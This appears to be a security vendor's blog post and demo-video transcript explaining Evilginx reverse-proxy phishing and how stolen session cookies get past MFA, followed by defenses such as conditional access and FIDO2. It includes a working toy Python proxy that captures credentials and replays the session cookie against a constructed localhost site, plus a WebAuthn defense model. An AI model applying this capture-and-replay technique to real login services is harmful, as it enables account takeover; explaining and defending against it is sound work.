Cybercriminals are constantly evolving their methods, and one particularly dangerous attack vector that has been compromising business emails—even those protected by multi-factor authentication (MFA)—is the Evilginx Reverse Proxy attack. In this post, we’ll break down how this attack works, demonstrate its effectiveness, and most importantly, discuss how to defend against it.
How the Evilginx Reverse Proxy Attack Works
Evilginx is an open-source attack tool that can be deployed on a cloud server for as little as $5, with a domain name costing around $10 per year. Because of its accessibility and ease of use, even those with basic technical knowledge can set up this attack within a few hours.
Step 1: Setting Up a Phishing Domain
Attackers register a domain that looks nearly identical to a legitimate one, such as a Microsoft login address, and point Evilginx at it. Evilginx does not host a copy of the login page: it reverse-proxies the real site through the attacker's domain, so the victim is served the genuine page and only the address bar differs. Since Microsoft uses various subdomains and URLs, the fraudulent domain can appear convincing at first glance.
Step 2: The Phishing Email
The attack usually begins with a phishing email. The recipient may receive an email from a trusted contact—whose account has already been compromised—prompting them to click on a link to view an invoice or another document.
Step 3: The Fake Login Page
Clicking the link sends the victim to the attacker's domain, which relays Microsoft's real login portal through the proxy, so the page is the genuine one rather than a look-alike. The victim, believing it to be legitimate, enters their email and password.
Step 4: Capturing Credentials and MFA Tokens
Because every request passes through the proxy, Evilginx records the username and password in real time as they are forwarded to the real site. If multi-factor authentication is enabled, the real site prompts the victim as usual: they approve the push notification in their authenticator app or enter a one-time passcode. MFA succeeds, the real site issues its session cookie, and Evilginx captures that cookie from the response on its way back to the victim. That cookie, not the password, is what gives the attacker control of the account.
Step 5: Bypassing Multi-Factor Authentication
The intercepted session cookie is the key to the attack. It is a bearer token: whoever presents it is treated as the already-authenticated user, so the attacker can import it into a browser on any device, anywhere in the world, and is never asked for a password or a second factor. MFA was not broken; the victim completed it, and the attacker simply reuses the result.
Step 6: Exploiting Access
Once inside, attackers can access OneDrive files, SharePoint data, emails, and even set up forwarding rules to monitor communications. If they gain access to a global admin account, the damage can be even more severe, allowing them to manipulate settings, create new accounts, or even deploy further attacks.
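To make steps 1 through 6 concrete, here is an added example that is not part of the original post and not Evilginx's own code: a toy Python reverse proxy placed in front of a toy login server, both on 127.0.0.1. The site, the user alice@example.test, the password, the one-time code and the /login and /inbox paths are all constructed for the demonstration. Running it shows the three things the steps describe: the proxy relays the real site's traffic unchanged, it records the submitted credentials and the Set-Cookie header as they pass through, and replaying that cookie to the real site from a different client returns the inbox with no password and no MFA prompt.

```python
"""Added example: a toy reverse-proxy capture of credentials and a session cookie.
Everything here is constructed (fake site, fake user, fake credentials); no real
service is involved.
"""
import http.client
import http.server
import secrets
import threading
from http import HTTPStatus
from urllib.parse import parse_qs, urlencode

VALID = {"user": "alice@example.test", "password": "Sup3r-secret", "otp": "123456"}
SESSIONS = {}   # toy site state: session id -> user
CAPTURED = []   # what the proxy harvests: form fields plus the session cookie


class RealSite(http.server.BaseHTTPRequestHandler):
    """The genuine login: issues a session cookie only when password AND OTP match."""

    def _reply(self, status, body=b"", cookie=None):
        self.send_response(status)
        if cookie:
            # HttpOnly keeps page scripts away from it; a proxy reads it off the wire anyway.
            self.send_header("Set-Cookie", f"session={cookie}; HttpOnly")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):  # /login
        body = self.rfile.read(int(self.headers.get("Content-Length", 0))).decode()
        form = {k: v[0] for k, v in parse_qs(body).items()}
        if {k: form.get(k) for k in VALID} != VALID:
            return self._reply(HTTPStatus.UNAUTHORIZED, b"bad password or code")
        sid = secrets.token_hex(16)
        SESSIONS[sid] = form["user"]
        self._reply(HTTPStatus.OK, b"signed in", cookie=sid)

    def do_GET(self):  # /inbox: a bearer cookie is all that is checked
        sid = self.headers.get("Cookie", "").removeprefix("session=")
        if sid in SESSIONS:
            self._reply(HTTPStatus.OK, f"inbox of {SESSIONS[sid]}".encode())
        else:
            self._reply(HTTPStatus.UNAUTHORIZED, b"login required")

    def log_message(self, *args):
        pass


class Proxy(http.server.BaseHTTPRequestHandler):
    """The attacker's host: relays every request to the real site and records what it sees."""
    upstream = None  # (host, port) of RealSite, filled in by start_servers()

    def do_GET(self):
        self._relay(None)

    def do_POST(self):
        self._relay(self.rfile.read(int(self.headers.get("Content-Length", 0))))

    def _relay(self, body):
        # Forward headers as-is, except Host (rewritten to the real site) and
        # Content-Length (recomputed by http.client for the forwarded body).
        fwd = {k: v for k, v in self.headers.items() if k.lower() not in ("host", "content-length")}
        conn = http.client.HTTPConnection(*self.upstream)
        conn.request(self.command, self.path, body=body, headers=fwd)
        resp = conn.getresponse()
        data = resp.read()
        record = {k: v[0] for k, v in parse_qs(body.decode()).items()} if body else {}
        if resp.getheader("Set-Cookie"):
            record["cookie"] = resp.getheader("Set-Cookie").split(";")[0]
        if record:
            CAPTURED.append(record)   # step 4: credentials and session cookie, in the clear
        self.send_response(resp.status)
        for k, v in resp.getheaders():  # hand the genuine reply back to the victim
            if k.lower() not in ("date", "server"):
                self.send_header(k, v)
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):
        pass


def start_servers():
    real = http.server.ThreadingHTTPServer(("127.0.0.1", 0), RealSite)
    Proxy.upstream = real.server_address
    proxy = http.server.ThreadingHTTPServer(("127.0.0.1", 0), Proxy)
    for srv in (real, proxy):
        threading.Thread(target=srv.serve_forever, daemon=True).start()
    return real.server_address, proxy.server_address


def run_demo():
    real_addr, proxy_addr = start_servers()
    # Steps 3-4: the victim signs in on the attacker's host, which relays to the real site.
    conn = http.client.HTTPConnection(*proxy_addr)
    conn.request("POST", "/login", body=urlencode(VALID).encode(),
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    victim = conn.getresponse()
    victim.read()
    stolen = CAPTURED[-1]
    # Step 5: the attacker presents the harvested cookie to the real site from another
    # client. No password, no second factor: the cookie alone is the proof of login.
    conn = http.client.HTTPConnection(*real_addr)
    conn.request("GET", "/inbox", headers={"Cookie": stolen["cookie"]})
    replay = conn.getresponse()
    return {"victim_status": victim.status, "captured": stolen,
            "replay_status": replay.status, "replay_body": replay.read().decode()}


if __name__ == "__main__":
    print(run_demo())
```

The toy site deliberately checks nothing but the cookie, which is also true of a real web session once the login flow has finished: the server has no way to tell the victim's browser from the attacker's unless something beyond the cookie (device identity, network location, a token bound to the client) is demanded, which is what the defenses below add.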
How to Protect Against Evilginx Attacks
While this attack is highly effective, there are ways to defend against it. One of the best methods is implementing conditional access policies, which can block the replayed session, and the proxied sign-in itself, based on specific criteria such as:
Restricting access by IP address: allow sign-ins only from trusted locations, so a session replayed from the attacker's server is refused. This helps only as long as the attacker cannot route through an address inside the allowed range.
Enforcing device compliance policies: require a managed, compliant device, so the attacker's browser, which cannot present the required device identity, is turned away even with a valid stolen token.
Utilizing phishing-resistant authentication methods like FIDO2 security keys: the browser binds a FIDO2 credential to the site's origin and refuses to use it on a look-alike domain, so a proxied login never completes and there is no session to steal.
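As an added example (not from the original post, and not Microsoft's or any library's code) of why the last item works, here is a small Python model of a WebAuthn assertion with the relying-party checks that defeat a reverse proxy. The RP ID login.example.test, the look-alike domain login.example-test.test and the challenge are constructed; the signature check, which a real relying party also performs, is omitted to keep the two bindings in view. The browser, not the page, records the origin it is on, and it will not use a credential registered for login.example.test on any other host, so a proxied FIDO2 login never produces anything the attacker can relay.

```python
"""Added example: the two bindings that make a FIDO2/WebAuthn login useless to a
reverse proxy. Origins, RP ID and challenge are constructed; signature verification
is left out to keep the bindings in focus (a real relying party checks it too).
"""
import base64
import hashlib
import json
import secrets

RP_ID = "login.example.test"                  # constructed relying-party ID
EXPECTED_ORIGIN = "https://login.example.test"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def browser_get_assertion(page_origin, rp_id, challenge):
    """Model of the browser side. The requested RP ID must be the page's host or a
    parent domain of it; otherwise the browser refuses before the key is touched
    (simplified: the real rule also consults the public-suffix list)."""
    host = page_origin.removeprefix("https://").split("/")[0]
    if not (host == rp_id or host.endswith("." + rp_id)):
        return None
    # The browser, not the page, writes the origin. A proxy serving the page from its
    # own domain cannot make the browser write the real site's origin here.
    client_data = {"type": "webauthn.get", "challenge": challenge, "origin": page_origin}
    # authenticatorData = rpIdHash (32) + flags (1, bit 0 = user present) + signCount (4)
    auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01" + b"\x00\x00\x00\x00"
    return {"clientDataJSON": b64url(json.dumps(client_data).encode()),
            "authenticatorData": b64url(auth_data)}


def rp_verify(assertion, expected_challenge):
    """Relying-party checks from the WebAuthn assertion procedure (minus the signature)."""
    cd = json.loads(b64url_decode(assertion["clientDataJSON"]))
    if cd.get("type") != "webauthn.get":
        return "wrong type"
    if cd.get("challenge") != expected_challenge:
        return "challenge mismatch (replay or stale)"
    if cd.get("origin") != EXPECTED_ORIGIN:
        return f"origin mismatch: {cd.get('origin')}"
    auth_data = b64url_decode(assertion["authenticatorData"])
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return "rpIdHash mismatch"
    if not auth_data[32] & 0x01:
        return "user presence flag not set"
    return "ok"


def demo():
    challenge = b64url(secrets.token_bytes(32))
    phish_origin = "https://login.example-test.test"   # constructed look-alike domain
    legit = browser_get_assertion(EXPECTED_ORIGIN, RP_ID, challenge)
    # The proxied page asks for the real RP ID but is served from the look-alike host.
    proxied = browser_get_assertion(phish_origin, RP_ID, challenge)
    # Even an assertion obtained under the attacker's own domain carries that domain.
    forged = browser_get_assertion(phish_origin, "login.example-test.test", challenge)
    return {
        "legit": rp_verify(legit, challenge),
        "browser_refuses_proxied": proxied is None,
        "forged": rp_verify(forged, challenge),
        "replayed": rp_verify(legit, b64url(secrets.token_bytes(32))),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Contrast this with a password and a one-time code: both are just strings the victim types, so they relay through a proxy unchanged. A WebAuthn assertion is computed by the browser and authenticator over the origin and a server challenge, and the relying party rejects anything computed under a different origin or for a different challenge.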
If your organization wants to learn more about securing accounts against this attack, reach out to us. We can provide detailed instructions on how to set up protective measures to safeguard your business from these threats.
Cybersecurity is constantly evolving—make sure your defenses are too.
Evilginx Reverse Proxy Attack Transcript
0:02 This is a quick demo video on the Evilginx Reverse Proxy attack. This method is responsible for many business email compromises.
0:12 Even with multi-factor authentication (MFA), this attack can capture authentication codes and bypass security measures.
0:21 We set up an Evilginx cloud server. It’s an open-source attack tool that anyone can download. It costs around $5 to host on a cloud server and $10 per year for a domain.
0:41 This makes it very inexpensive to set up, and someone with basic technical skills could configure it within a few hours.
0:52 We’re going to demonstrate how this works using a Microsoft phishing setup. These setups, called “phishlets,” can also be used to target Facebook, Instagram, Coinbase, and more. Even with MFA enabled, the attack can still succeed.
1:16 We purchased a demo domain, which looks very convincing. If someone saw this domain, they might need to look twice or verify online to confirm its legitimacy. Microsoft has many subdomains, making it easy to trick users.
1:42 These attacks often arrive via phishing emails. A user may receive an email from a compromised contact, asking them to click a link to view an invoice or important document.
2:04 Clicking the link leads to a fake page asking the user to log into Microsoft OneDrive. The victim believes they must enter their credentials to access the document.
2:28 In this demonstration, the user enters their email and password. Since we enabled MFA, they receive an authentication request on their mobile device.
2:48 We approve the request using the Microsoft Authenticator app. This attack also works with text message codes or other MFA methods.
2:59 Once approved, the user is redirected to the real Microsoft site, unaware that their credentials and session token have been stolen.
3:18 Now, let’s switch to the attacker’s side. By running a session command, we can see the captured email, password, and session token.
3:37 The session token is the key to bypassing MFA. Using this, an attacker can log in from any device without needing additional authentication.
3:59 As a test, we use a separate computer and log into “portal.office.com.” Initially, no one is logged in.
4:18 Using a browser extension, we import the stolen session token, refresh the page, and gain full access to the account.
4:31 This attack allows hackers to access OneDrive, SharePoint, and emails. If they compromise a global admin account, they can cause severe damage.
4:54 This demo shows how easily this attack works. However, we have security measures that can prevent it.
5:01 By setting up conditional access policies, organizations can block this attack by restricting access based on IP address or device ID.
5:17 If you’re interested in securing your business, reach out to us. We can provide guidance on setting up these security measures.
5:22 Thanks for watching.